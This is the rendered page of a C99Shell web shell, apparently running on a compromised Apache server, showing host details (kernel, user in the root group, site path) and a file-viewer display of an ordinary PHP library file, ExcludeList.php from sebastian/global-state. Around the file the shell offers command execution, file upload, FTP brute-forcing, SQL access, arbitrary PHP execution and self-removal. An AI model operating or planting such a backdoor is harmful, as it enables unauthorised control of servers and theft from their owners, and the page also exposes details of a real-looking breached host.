!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/smabpro.picotech.app/public_html/vendor/sebastian/global-state/src/   drwxr-xr-x
Free 28.61 GB of 117.98 GB (24.25%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     ExcludeList.php (2.52 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php declare(strict_types=1);
/*
 * This file is part of sebastian/global-state.
 *
 * (c) Sebastian Bergmann <sebastian@phpunit.de>
 *
 * For the full copyright and license information, please view the LICENSE
 * file that was distributed with this source code.
 */
namespace SebastianBergmann\GlobalState;

use function 
in_array;
use function 
str_starts_with;
use 
ReflectionClass;

final class 
ExcludeList
{
    private array 
$globalVariables   = [];
    private array 
$classes           = [];
    private array 
$classNamePrefixes = [];
    private array 
$parentClasses     = [];
    private array 
$interfaces        = [];
    private array 
$staticProperties  = [];

    public function 
addGlobalVariable(string $variableName): void
    
{
        
$this->globalVariables[$variableName] = true;
    }

    public function 
addClass(string $className): void
    
{
        
$this->classes[] = $className;
    }

    public function 
addSubclassesOf(string $className): void
    
{
        
$this->parentClasses[] = $className;
    }

    public function 
addImplementorsOf(string $interfaceName): void
    
{
        
$this->interfaces[] = $interfaceName;
    }

    public function 
addClassNamePrefix(string $classNamePrefix): void
    
{
        
$this->classNamePrefixes[] = $classNamePrefix;
    }

    public function 
addStaticProperty(string $classNamestring $propertyName): void
    
{
        if (!isset(
$this->staticProperties[$className])) {
            
$this->staticProperties[$className] = [];
        }

        
$this->staticProperties[$className][$propertyName] = true;
    }

    public function 
isGlobalVariableExcluded(string $variableName): bool
    
{
        return isset(
$this->globalVariables[$variableName]);
    }

    
/**
     * @psalm-param class-string $className
     */
    
public function isStaticPropertyExcluded(string $classNamestring $propertyName): bool
    
{
        if (
in_array($className$this->classestrue)) {
            return 
true;
        }

        foreach (
$this->classNamePrefixes as $prefix) {
            if (
str_starts_with($className$prefix)) {
                return 
true;
            }
        }

        
$class = new ReflectionClass($className);

        foreach (
$this->parentClasses as $type) {
            if (
$class->isSubclassOf($type)) {
                return 
true;
            }
        }

        foreach (
$this->interfaces as $type) {
            if (
$class->implementsInterface($type)) {
                return 
true;
            }
        }

        return isset(
$this->staticProperties[$className][$propertyName]);
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0186 ]--